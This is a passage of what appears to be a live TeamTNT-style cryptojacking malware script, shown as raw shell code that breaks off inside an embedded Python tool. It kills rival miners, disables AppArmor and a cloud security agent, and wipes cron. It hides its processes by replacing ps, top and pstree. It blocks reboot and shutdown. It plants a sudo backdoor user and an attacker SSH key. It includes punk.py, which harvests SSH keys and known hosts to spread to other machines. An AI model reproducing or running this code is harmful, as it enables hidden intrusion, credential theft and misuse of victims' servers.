>/etc/newsvc.sh

>/etc/svcupdate

>/etc/svcguard

>/etc/svcworkmanager

>/etc/svcupdates

>/tmp/newsvc.sh

>/tmp/svcupdate

>/tmp/svcguard

>/tmp/svcworkmanager

>/tmp/svcupdates

chattr +ia /etc/newsvc.sh

chattr +ia /etc/svc*

chattr +ia /tmp/newsvc.sh

chattr +ia /tmp/svc*

sleep 1

chattr -ia /etc/phpupdate

chattr -ia /etc/phpguard

chattr -ia /etc/networkmanager

chattr -ia /etc/newdat.sh

>/etc/phpupdate

>/etc/phpguard

>/etc/networkmanager

>/etc/newdat.sh

chattr +ia /etc/phpupdate

chattr +ia /etc/phpguard

chattr +ia /etc/networkmanager

chattr +ia /etc/newdat.sh

chattr -ia /etc/zzh

chattr -ia /etc/newinit

>/etc/zzh

>/etc/newinit

chattr +ia /etc/zzh

chattr +ia /etc/newinit

sleep 1

chattr -i /usr/lib/systemd/systemd-update-daily

echo 1 > /usr/lib/systemd/systemd-update-daily

chattr +i /usr/lib/systemd/systemd-update-daily

#yum install -y docker.io || apt-get install docker.io;

docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %

docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %

docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %

docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %

docker rm -f dockgeddon

#echo SELINUX=disabled >/etc/selinux/config

service apparmor stop

systemctl disable apparmor

service aliyun.service stop

systemctl disable aliyun.service

ps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %

ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %

rm -rf /usr/local/aegis

chattr -R -ia /var/spool/cron

chattr -ia /etc/crontab

chattr -R -ia /etc/cron.d

chattr -R -ia /var/spool/cron/crontabs

crontab -r

rm -rf /var/spool/cron/*

rm -rf /etc/cron.d/*

rm -rf /var/spool/cron/crontabs

rm -rf /etc/crontab

}

kill_miner_proc


kill_sus_proc()

{

    ps axf -o "pid"|while read procid

    do

            ls -l /proc/$procid/exe | grep /tmp

            if [ $? -ne 1 ]

            then

                    cat /proc/$procid/cmdline| grep -a -E "crypto"

                    if [ $? -ne 0 ]

                    then

                            kill -9 $procid

                    else

                            echo "don't kill"

                    fi

            fi

    done

    ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid

    do

            cat /proc/$procid/cmdline| grep -a -E "crypto"

            if [ $? -ne 0 ]

            then

                    kill -9 $procid

            else

                    echo "don't kill"

            fi

    done

}

kill_sus_proc


#FixTheSystem


function SetupNameServers(){

grep -q 8.8.8.8 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.8.8" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null

grep -q 8.8.4.4 /etc/resolv.conf || chattr -i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht -i /etc/resolv.conf 2>/dev/null 1>/dev/null; echo "nameserver 8.8.4.4" >> /etc/resolv.conf; chattr +i /etc/resolv.conf 2>/dev/null 1>/dev/null; tntrecht +i /etc/resolv.conf 2>/dev/null 1>/dev/null

}


SetupNameServers



chattr -iR /var/spool/cron/

tntrecht -iR /var/spool/cron/

crontab -r


function clean_cron(){

chattr -R -ia /var/spool/cron

tntrecht -R -ia /var/spool/cron

chattr -ia /etc/crontab

tntrecht -ia /etc/crontab

chattr -R -ia /etc/cron.d

tntrecht -R -ia /etc/cron.d

chattr -R -ia /var/spool/cron/crontabs

tntrecht -R -ia /var/spool/cron/crontabs

crontab -r

rm -rf /var/spool/cron/*

rm -rf /etc/cron.d/*

rm -rf /var/spool/cron/crontabs

rm -rf /etc/crontab

}


clean_cron



function lock_cron()

{

    chattr -R +ia /var/spool/cron

    tntrecht -R +ia /var/spool/cron

    touch /etc/crontab

    chattr +ia /etc/crontab

    tntrecht +ia /etc/crontab

    chattr -R +ia /var/spool/cron/crontabs

    tntrecht -R +ia /var/spool/cron/crontabs

    chattr -R +ia /etc/cron.d

    tntrecht -R +ia /etc/cron.d

}


lock_cron


function CheckAboutSomeKeys(){

    if [ -f "/root/.ssh/id_rsa" ]

    then

echo 'found: /root/.ssh/id_rsa'

    fi


    if [ -f "/home/*/.ssh/id_rsa" ]

    then

echo 'found: /home/*/.ssh/id_rsa'

    fi


    if [ -f "/root/.aws/credentials" ]

    then

echo 'found: /root/.aws/credentials'

    fi


    if [ -f "/home/*/.aws/credentials" ]

    then

echo 'found: /home/*/.aws/credentials'

    fi

}


CheckAboutSomeKeys



if [ -f "/usr/bin/TeamTNT/[crypto]" ]

then 

service crypto stop

rm -fr /usr/bin/TeamTNT/

fi


function SecureTheSystem(){

echo "begin  SecureTheSystem"

    if [ -f "/bin/ps.original" ]

    then

        echo "/bin/ps changed"

    else

        mv /bin/ps /bin/ps.original    

        echo "#! /bin/bash">>/bin/ps

        echo "ps.original \$@ | grep -v \"crypto\|scan\"">>/bin/ps

        chmod +x /bin/ps

                touch -d 20160825 /bin/ps

        echo "/bin/ps changing"

    fi

    if [ -f "/bin/top.original" ]

    then

        echo "/bin/top changed"

    else

        mv /bin/top /bin/top.original  

        echo "#! /bin/bash">>/bin/top

        echo "top.original \$@ | grep -v \"crypto\|scan\"">>/bin/top

        chmod +x /bin/top

                touch -d 20160825 /bin/top

        echo "/bin/top changing"

    fi

    if [ -f "/bin/pstree.original" ]

    then

        echo "/bin/pstree changed"

    else

        mv /bin/pstree /bin/pstree.original

        echo "#! /bin/bash">>/bin/pstree

        echo "pstree.original \$@ | grep -v \"crypto\|scan\"">>/bin/pstree

        chmod +x /bin/pstree

                touch -d 20160825 /bin/pstree

        echo "/bin/pstree changing"

    fi

    if [ -f "/bin/chattr" ]

        then

                chattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`

                if [ "$chattrsize" -lt "$chattr_size" ]

                then

            yum -y remove e2fsprogs

            yum -y install e2fsprogs

                else

                        echo "no need install chattr"

                fi

        else

            yum -y remove e2fsprogs

            yum -y install e2fsprogs

    fi

}


function LockDownTheSystem(){

LOCKDOWNARRAY=(shutdown reboot poweroff telinit)

for LOCKDOWN in ${LOCKDOWNARRAY[@]}; do

LOCKDOWNBIN=`which $LOCKDOWN` 2>/dev/null 1>/dev/null

chattr -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null

tntrecht -i $LOCKDOWNBIN 2>/dev/null 1>/dev/null

chattr -x $LOCKDOWNBIN 2>/dev/null 1>/dev/null

#chmod 000 $LOCKDOWNBIN 2>/dev/null 1>/dev/null

chattr +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null

tntrecht +i $LOCKDOWNBIN 2>/dev/null 1>/dev/null

done


chattr +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null

tntrecht +i /proc/sysrq-trigger 2>/dev/null 1>/dev/null



LOCKDOWNFILES=("/lib/systemd/system/reboot.target" "/lib/systemd/system/systemd-reboot.service")

for LOCKDOWNFILE in ${LOCKDOWNFILES[@]}; do


chattr -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null

tntrecht -i $LOCKDOWNFILE 2>/dev/null 1>/dev/null

chattr -x $LOCKDOWNFILE 2>/dev/null 1>/dev/null

> $LOCKDOWNFILE

rm -f $LOCKDOWNFILE 2>/dev/null 1>/dev/null

done


}



function KILLMININGSERVICES(){


echo "[*] Removing previous miner (if any)"

if sudo -n true 2>/dev/null; then

  sudo systemctl stop crypto.service

fi

killall -9 xmrig

echo "do KILLMININGSERVICES"


$(docker rm $(docker ps | grep -v grep | grep "/bin/bash -c 'apt" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)

#$(docker rm $(docker ps | grep -v grep | grep "/bin/bash" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)

$(docker rm $(docker ps | grep -v grep | grep "/root/startup.sh" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)


$(docker rm $(docker ps | grep -v grep | grep "widoc26117/xmr" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)

$(docker rm $(docker ps | grep -v grep | grep "zbrtgwlxz" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)

$(docker rm $(docker ps | grep -v grep | grep "tail -f /dev/null" | awk '{print $1}') -f 2>/dev/null 1>/dev/null)

rm -f /usr/bin/docker-update 2>/dev/null 1>/dev/null

pkill -f /usr/bin/docker-update 2>/dev/null 1>/dev/null

killall -9 docker-update  2>/dev/null 1>/dev/null


rm -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null

pkill -f /usr/bin/redis-backup 2>/dev/null 1>/dev/null

killall -9 redis-backup 2>/dev/null 1>/dev/null


rm -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null

pkill -f /tmp/moneroocean/xmrig 2>/dev/null 1>/dev/null

rm -fr /tmp/moneroocean/ 2>/dev/null 1>/dev/null

killall -9 xmrig 2>/dev/null 1>/dev/null


LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='


if [ ! -f /usr/bin/tntrecht ]; then

chattrbin=`which chattr` 

cp $chattrbin /usr/bin/tntrecht 2>/dev/null 1>/dev/null

chmod +x /usr/bin/tntrecht 2>/dev/null 1>/dev/null

chmod -x $chattrbin 2>/dev/null 1>/dev/null

tntrecht +i $chattrbin 2>/dev/null 1>/dev/null

fi


LOCKFILE='IyEvYmluL2Jhc2gKZWNobyAnRm9yYmlkZGVuIGFjdGlvbiAhISEgVGVhbVROVCBpcyB3YXRjaGluZyB5b3UhJw=='


if [ -f /root/.tmp/xmrig ]; then

chattr -iR /root/.tmp/ 2>/dev/null 1>/dev/null

tntrecht -iR /root/.tmp/ 2>/dev/null 1>/dev/null

tmpxmrig=("/root/.tmp/config.json" "/root/.tmp/config_background.json" "/root/.tmp/xmrig.log" "/root/.tmp/miner.sh" "/root/.tmp/xmrig")

for tmpxmrigfile in ${tmpxmrig[@]}; do

rm -f $tmpxmrigfile 2>/dev/null 1>/dev/null

pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null

kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null

echo $LOCKFILE | base64 -d > $tmpxmrigfile 

chmod +x $tmpxmrigfile 2>/dev/null 1>/dev/null

chattr +i $tmpxmrigfile 2>/dev/null 1>/dev/null

tntrecht +i $tmpxmrigfile 2>/dev/null 1>/dev/null

pkill -f $tmpxmrigfile 2>/dev/null 1>/dev/null

kill $(pidof $tmpxmrigfile) 2>/dev/null 1>/dev/null

killall $tmpxmrigfile 2>/dev/null 1>/dev/null

chmod -x /root/.tmp/xmrig 2>/dev/null 1>/dev/null

rm -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null

chattr +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null

tntrecht +i /root/.tmp/xmrig 2>/dev/null 1>/dev/null

pkill -f /root/.tmp/xmrig 2>/dev/null 1>/dev/null

ps ax| grep xmrig 2>/dev/null 1>/dev/null

done

fi


if [ -f /usr/sbin/cpumon ]; then

cpumonxmr=("/usr/sbin/cpumon" "/usr/cpu")

for cpumonfile in ${cpumonxmr[@]}; do

chattr -i $cpumonfile 2>/dev/null 1>/dev/null

tntrecht -i $cpumonfile 2>/dev/null 1>/dev/null

rm -f $cpumonfile 2>/dev/null 1>/dev/null

pkill -f $cpumonfile 2>/dev/null 1>/dev/null

kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null

echo $LOCKFILE | base64 -d > $cpumonfile

chmod +x $cpumonfile 2>/dev/null 1>/dev/null

chattr +i $cpumonfile 2>/dev/null 1>/dev/null

tntrecht +i $cpumonfile 2>/dev/null 1>/dev/null

pkill -f $cpumonfile 2>/dev/null 1>/dev/null

kill $(pidof $cpumonfile) 2>/dev/null 1>/dev/null

killall $cpumonfile 2>/dev/null 1>/dev/null

done

fi


if [ -f /opt/server ]; then

chattr -i /opt/server 2>/dev/null 1>/dev/null

tntrecht -i /opt/server 2>/dev/null 1>/dev/null

rm -f /opt/server 2>/dev/null 1>/dev/null

pkill -f /opt/server 2>/dev/null 1>/dev/null

kill $(pidof /opt/server) 2>/dev/null 1>/dev/null

fi


if [ -f /tmp/log_rotari ]; then

chattr -i /tmp/log_rotari 2>/dev/null 1>/dev/null

tntrecht -i /tmp/log_rotari 2>/dev/null 1>/dev/null

rm -f /tmp/log_rotari 2>/dev/null 1>/dev/null

pkill -f /tmp/log_rotari 2>/dev/null 1>/dev/null

kill $(pidof /tmp/log_rotari) 2>/dev/null 1>/dev/null

fi


BASH00=$(ps ax | grep -v grep |  grep "/root/.tmp00/bash")

if [ ! -z "$BASH00" ];

then

chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null

tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null

chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null

chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null

echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null

rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null

chattr -i /root/.tmp00/bash 2>/dev/null 1>/dev/null

tntrecht -i /root/.tmp00/bash 2>/dev/null 1>/dev/null

chmod -x /root/.tmp00/bash 2>/dev/null 1>/dev/null

pkill -f /root/.tmp00/bash 2>/dev/null 1>/dev/null

kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash" | awk '{print $1}') 2>/dev/null 1>/dev/null

kill $(pidof /root/.tmp00/bash) 2>/dev/null 1>/dev/null

echo " " > /root/.tmp00/bash 2>/dev/null 1>/dev/null

rm -f /root/.tmp00/bash 2>/dev/null 1>/dev/null

echo $StringToLock > /root/.tmp00/bash

chattr +i /root/.tmp00/bash 2>/dev/null 1>/dev/null

tntrecht +i /root/.tmp00/bash 2>/dev/null 1>/dev/null

history -c 2>/dev/null 1>/dev/null

fi


BASH6400=$(ps ax | grep -v grep |  grep "/root/.tmp00/bash64")

if [ ! -z "$BASH6400" ];

then

chattr -i /var/spool/cron/root 2>/dev/null 1>/dev/null

tntrecht -i /var/spool/cron/root 2>/dev/null 1>/dev/null

chmod 1777 /var/spool/cron/root 2>/dev/null 1>/dev/null

chmod -x /var/spool/cron/root 2>/dev/null 1>/dev/null

echo " " > /var/spool/cron/root 2>/dev/null 1>/dev/null

rm -f /var/spool/cron/root 2>/dev/null 1>/dev/null

chattr -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null

tntrecht -i /root/.tmp00/bash64 2>/dev/null 1>/dev/null

chmod -x /root/.tmp00/bash64 2>/dev/null 1>/dev/null

pkill -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null

kill $(ps ax | grep -v grep | grep "/root/.tmp00/bash64" | awk '{print $1}') 2>/dev/null 1>/dev/null

kill $(pidof /root/.tmp00/bash64) 2>/dev/null 1>/dev/null

echo " " > /root/.tmp00/bash64 2>/dev/null 1>/dev/null

rm -f /root/.tmp00/bash64 2>/dev/null 1>/dev/null

echo $StringToLock > /root/.tmp00/bash64

chattr +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null

tntrecht +i /root/.tmp00/bash64 2>/dev/null 1>/dev/null

history -c 2>/dev/null 1>/dev/null

fi


KINSING1=$(ps ax | grep -v grep |  grep "/var/tmp/kinsing")

if [ ! -z "$KINSING1" ];

then

chattr -i /var/tmp/kinsing 2>/dev/null 1>/dev/null

tntrecht -i /var/tmp/kinsing 2>/dev/null 1>/dev/null

chmod -x /var/tmp/kinsing 2>/dev/null 1>/dev/null

pkill -f /var/tmp/kinsing 2>/dev/null 1>/dev/null

kill $(ps ax | grep -v grep | grep "/var/tmp/kinsing" | awk '{print $1}') 2>/dev/null 1>/dev/null

kill $(pidof /var/tmp/kinsing) 2>/dev/null 1>/dev/null

echo " " > /var/tmp/kinsing 2>/dev/null 1>/dev/null

rm -f /var/tmp/kinsing 2>/dev/null 1>/dev/null

echo $StringToLock > /var/tmp/kinsing

chattr +i /var/tmp/kinsing 2>/dev/null 1>/dev/null

tntrecht +i /var/tmp/kinsing 2>/dev/null 1>/dev/null

history -c 2>/dev/null 1>/dev/null

fi


KINSING2=$(ps ax | grep -v grep |  grep "/tmp/kdevtmpfsi")

if [ ! -z "$KINSING2" ];

then

chattr -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null

tntrecht -i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null

chmod -x /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null

pkill -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null

kill $(ps ax | grep -v grep | grep "/tmp/kdevtmpfsi" | awk '{print $1}') 2>/dev/null 1>/dev/null

kill $(pidof /tmp/kdevtmpfsi) 2>/dev/null 1>/dev/null

echo " " > /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null

rm -f /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null

echo $StringToLock > /tmp/kdevtmpfsi

chattr +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null

tntrecht +i /tmp/kdevtmpfsi 2>/dev/null 1>/dev/null

history -c 2>/dev/null 1>/dev/null

fi


kill $(ps aux | grep -vw crypto | grep -v grep |grep -v scan | grep -vw "/usr/bin/xmrigMiner" | grep -vw "./shell"  | awk '{if($3>40.0) print $2}')


}


function makesshaxx(){

echo "begin makessh"

RSAKEY="ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver"

grep -q hilde /etc/passwd || chattr -ia /etc/passwd; 

grep -q hilde /etc/passwd || tntrecht -ia /etc/passwd; 

grep -q hilde /etc/passwd || echo 'hilde:x:1000:1000::/home/hilde:/bin/bash' >> /etc/passwd; chattr +ia /etc/passwd; tntrecht +ia /etc/passwd

grep -q hilde /etc/shadow || chattr -ia /etc/shadow; 

grep -q hilde /etc/shadow || tntrecht -ia /etc/shadow; 

grep -q hilde /etc/shadow || echo 'hilde:$6$7n/iy4R6znS2iq0J$QjcECLSqMMiUUeHR4iJmkHLzAwgoNRhCC87HI3df95nZH5569TKwJEN2I/lNanPe0vhsdgfILPXedlWlZn7lz0:18461:0:99999:7:::' >> /etc/shadow; chattr +ia /etc/shadow; tntrecht +ia /etc/shadow

grep -q hilde /etc/sudoers || chattr -ia /etc/sudoers; 

grep -q hilde /etc/sudoers || tntrecht -ia /etc/sudoers; 

grep -q hilde /etc/sudoers || echo 'hilde  ALL=(ALL:ALL) ALL' >> /etc/sudoers; chattr +i /etc/sudoers; tntrecht +i /etc/sudoers


mkdir /home/hilde/.ssh/ -p  

touch /home/hilde/.ssh/authorized_keys  

touch /home/hilde/.ssh/authorized_keys2  

chmod 600 /home/hilde/.ssh/authorized_keys

chmod 600 /home/hilde/.ssh/authorized_keys2

grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || chattr -ia /home/hilde/.ssh/authorized_keys; 

grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || tntrecht -ia /home/hilde/.ssh/authorized_keys; 

grep -q root@puppetserver /home/hilde/.ssh/authorized_keys || echo $RSAKEY > /home/hilde/.ssh/authorized_keys; chattr +ia /home/hilde/.ssh/authorized_keys; tntrecht +ia /home/hilde/.ssh/authorized_keys;

grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || chattr -ia /home/hilde/.ssh/authorized_keys2; 

grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || tntrecht -ia /home/hilde/.ssh/authorized_keys2; 

grep -q root@puppetserver /home/hilde/.ssh/authorized_keys2 || echo $RSAKEY > /home/hilde/.ssh/authorized_keys2; chattr +ia /home/hilde/.ssh/authorized_keys2; tntrecht +ia /home/hilde/.ssh/authorized_keys2;

mkdir /root/.ssh/ -p  

touch /root/.ssh/authorized_keys  

touch /root/.ssh/authorized_keys2

chmod 600 /root/.ssh/authorized_keys

chmod 600 /root/.ssh/authorized_keys2

grep -q root@puppetserver /root/.ssh/authorized_keys || chattr -ia /root/.ssh/authorized_keys; 

grep -q root@puppetserver /root/.ssh/authorized_keys || tntrecht -ia /root/.ssh/authorized_keys; 

grep -q root@puppetserver /root/.ssh/authorized_keys || echo $RSAKEY >> /root/.ssh/authorized_keys; chattr +ia /root/.ssh/authorized_keys; tntrecht +ia /root/.ssh/authorized_keys

grep -q root@puppetserver /root/.ssh/authorized_keys2 || chattr -ia /root/.ssh/authorized_keys2; 

grep -q root@puppetserver /root/.ssh/authorized_keys2 || tntrecht -ia /root/.ssh/authorized_keys2; 

grep -q root@puppetserver /root/.ssh/authorized_keys2 || echo $RSAKEY > /root/.ssh/authorized_keys2; chattr +ia /root/.ssh/authorized_keys2; tntrecht +ia /root/.ssh/authorized_keys2

}


function CreateSshPunker(){

if [ ! -f "/usr/bin/pu"]

then

echo '#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
#             |
#          \   |   /
#     .     \  |  /    .
#      `-.__|\/_\/|_.-'
#    .__  \ /     `./  
#       `-        @|
#      .-'`.  !!    -   punk.py - unix SSH post-exploitation 1337 tool
#     '     `  !  __.'  Copyright (C) 2018 < Giuseppe `r3vn` Corti >
#           _)___(      https://xfiltrated.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import os
import sys
import threading
import argparse
import base64
import hashlib
import re
import socket
import struct
import hmac
import binascii

try: 
    import queue as queue
except ImportError:
    import Queue as queue


homesBlacklist = ["/dev/null","/var/empty","/bin","/sbin"]
shellBlacklist = ["/sbin/nologin","/bin/false","/usr/sbin/nologin","/bin/sync"]
knownHosts     = []
success        = []
users          = []
sshKeys        = []

   
class SSHThread(threading.Thread) :
 
	def __init__(self, q, tid, credentials, CMD="") :
		threading.Thread.__init__(self)
		self.queue = q
		self.tid = tid
		self.credentials = credentials
 
	def run(self) :
		while True :
			host = None 
			try :
				host = self.queue.get(timeout=1)
 
			except 	queue.Empty :
				return
 
			
			for user in users:
				for keys in sshKeys:
					try:
						if int(os.system("ssh -oBatchMode=yes -oStrictHostKeyChecking=no -oPasswordAuthentication=no -oConnectTimeout=8 %s@%s -i %s -q exit" % (user,host,key ))) == 0:
							self.credentials.put(user+":"+host+":"+key)

							if user+":"+host+":"+key not in success:
								sys.stdout.write ("\033[92m[*]\033[0m Got \033[92m%s@%s\033[0m with \033[92m\"%s\"\033[0m key.\n" % (user,host,key))
								success.append(user+":"+host+":"+key)
							
							if CMD != '':
								sys.stdout.write ("\033[92m[*]\033[0m Executing \033[92m%s\033[0m.\n" % (CMD))
								os.system("ssh -oBatchMode=yes -oStrictHostKeyChecking=no -oPasswordAuthentication=no -oConnectTimeout=8 %s@%s -i %s -q -t \"%s\" " % (user,host,key,CMD))
					except:
						pass
 
 
			self.queue.task_done()


class CrackThread(threading.Thread) :
 
	def __init__(self, q, tid, ips, magic, salt, hashed) :
		threading.Thread.__init__(self)
		self.queue  = q
		self.tid    = tid
		self.ips    = ips
		self.magic  = magic
		self.salt   = base64.b64decode(salt)
		self.hashed = hashed

 
	def run(self) :
		while True :
			host = None 
			try :
				ip_try = self.queue.get(timeout=1)
 
			except 	queue.Empty :
				return


			h = hmac.new(self.salt, msg=ip_try.encode(), digestmod=hashlib.sha1) # FIXME
			ip_hash = base64.b64encode(h.digest()).decode()


			if ip_hash == self.hashed:
				knownHosts.append(ip_try)
				sys.stdout.write ("\033[92m[*]\033[0m Found \033[92m%s\033[0m\n" % (ip_try))

			#sys.stdout.write ("\n-----\nip: "+ip_try+"\n salt: "+self.salt.decode()+"\n output: "+ip_hash+"\ntarget: "+self.hashed)

			self.queue.task_done()


class attack(object):

	def __init__(self, cmd, threads):
		self.cmd = cmd
		self.threads = threads

	def run(self):

		q           = queue.Queue()
		credentials = queue.Queue()

		threads = []
		for i in range(1, self.threads) : # Number of threads
			worker = SSHThread(q, i, credentials, self.cmd) 
			worker.setDaemon(True)
			worker.start()
			threads.append(worker)

		for host in knownHosts:
			q.put(host)

		q.join()
		 
		# wait for all threads to exit 
		if not credentials.empty():
			out = (credentials.get()).split(":")
		else:
			return False
		 
		for item in threads :
			item.join()

		return out[0], out[1] # Output attack: user, host





class crack_host(object):

	def __init__(self, host_string, subnet, threads):
		""" crack an encrypted known host """

		self.magic   = host_string.split("|")[1]
		self.salt    = host_string.split("|")[2]
		self.hashed  = host_string.split("|")[3].split(" ")[0]
		self.subnet  = subnet # TODO
		self.threads = threads

	def run(self):

		q           = queue.Queue()
		ips         = queue.Queue()

		threads = []
		for i in range(1, self.threads) : # Number of threads
			worker = CrackThread(q, i, ips, self.magic, self.salt, self.hashed) 
			worker.setDaemon(True)
			worker.start()
			threads.append(worker)

		for host in ipv4_range(self.subnet): # TODO
			q.put(str(host))              # TODO

		q.join()
		 
		# wait for all threads to exit 
		if not ips.empty():
			out = (ips.get()).split(":")
		else:
			return False
		 
		for item in threads :
			item.join()

		return out[0], out[1] # Output attack: user, host

def discovery(args):
	# Search users, SSH keys and known hosts

	if args.passwd:
		# Get users and home paths from passwd
		F = open("/etc/passwd",'r')

		for line in F:
			if not line.startswith('#'): # skip comments

				user  = line.split(":")[0]
				home  = line.split(":")[5]
				shell = line.split(":")[6].replace("\n","")

				if home not in homesBlacklist and shell not in shellBlacklist:

					users.append(user)

					#collect known hosts
					if os.path.isfile(home + "/.ssh/known_hosts"):
						FK = open(home + "/.ssh/known_hosts")
						encrypted_knownhosts = False

						for host in FK:
							if not host.find("|") >= 0: # secure known_hosts
								if host.find(",") >= 0:
									hostname = host.split(" ")[0].split(",")[1]
								else:
									hostname = host.split(" ")[0]
								if hostname not in knownHosts:
									knownHosts.append(hostname)
							else:
								encrypted_knownhosts = True
									

						if encrypted_knownhosts and args.crack == "":
							sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s/.ssh/known_hosts\033[0m\n" % home )
							sys.stdout.write ("\033[93m[!]\033[0m Run with \033[93m--crack\033[0m flag to break it\n")

						elif encrypted_knownhosts and args.crack != "":
							# crack the hashed known hosts
							sys.stdout.write ("\033[92m[*]\033[0m Cracking known hosts on \033[92m%s/.ssh/known_hosts...\033[0m\n" % home )
							FK = open(home + "/.ssh/known_hosts")
							for host in FK:
								if host.find("|") >= 0:
									crack_obj = crack_host(host, args.crack, args.threads)
									crack_obj.run()
							#sys.stdout.write ("\033[92m[*]\033[0m Cracking done.\n")

						FK.close()

					# check users with private keys
					if os.path.isfile(home + "/.ssh/id_rsa"): 
						#targets[user]=home + "/.ssh/id_rsa"  # username and home dir
						if home+"/.ssh/id_rsa" not in sshKeys:
							sshKeys.append(home + "/.ssh/id_rsa")
		F.close()

	# home directory scan
	for homes in os.listdir(args.home):
		if homes not in users:

			users.append(homes)

			if os.path.isfile(args.home+homes + "/.ssh/id_rsa"):
				#targets[homes] = homes + "/.ssh/id_rsa"
				if args.home+homes + "/.ssh/id_rsa" not in sshKeys:
					sshKeys.append(args.home+homes + "/.ssh/id_rsa")

			if os.path.isfile(args.home+homes + "/.ssh/known_hosts"):
				FK = open(args.home+homes + "/.ssh/known_hosts")
				encrypted_knownhosts = False

				for host in FK:
					if not host.find("|") >= 0: # secure known_hosts
						if host.find(",") >= 0:
							hostname = host.split(" ")[0].split(",")[1]
						else:
							hostname = host.split(" ")[0]
						if hostname not in knownHosts:
							knownHosts.append(hostname)
					else:
						encrypted_knownhosts = True


				if encrypted_knownhosts and args.crack == "":
